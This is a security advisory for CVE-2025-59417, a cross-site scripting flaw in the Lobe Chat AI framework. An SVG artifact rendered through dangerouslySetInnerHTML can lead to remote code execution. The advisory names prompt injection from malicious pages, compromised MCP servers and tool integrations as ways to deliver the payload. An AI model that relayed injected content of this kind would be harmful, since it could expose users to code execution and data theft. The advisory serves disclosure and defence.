Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2025-59417
Summary
Lobe Chat is an open-source artificial intelligence chat framework. In versions through 1.129.3, there is a Cross-Site Scripting (XSS) vulnerability when handling chat message in lobe-chat that can be escalated to remote code execution on the user's machine. In lobe-chat, when the response from the server is like "<lobeArtifact identifier="ai-new-interpretation" ...>", it will be rendered with the lobeArtifact node, instead of the plain text. However, when the type of the lobeArtifact is image/svg+xml , it will be rendered as the "SVGRender" component, which internally uses "dangerouslySetInnerHTML" to set the content of the svg, resulting in XSS attack. Any party capable of injecting content into chat messages, such as hosting a malicious page for prompt injection, operating a compromised MCP server, or leveraging tool integrations, can exploit this vulnerability.
- LOW
- NETWORK
- LOW
- CHANGED
- REQUIRED
- NONE
- LOW
- NONE
CWE-79 - Cross Site Scripting
Cross-Site Scripting, commonly referred to as XSS, is the most dominant class of vulnerabilities. It allows an attacker to inject malicious code into a pregnable web application and victimize its users. The exploitation of such a weakness can cause severe issues such as account takeover, and sensitive data exfiltration. Because of the prevalence of XSS vulnerabilities and their high rate of exploitation, it has remained in the OWASP top 10 vulnerabilities for years.
References
Advisory Timeline
- Published
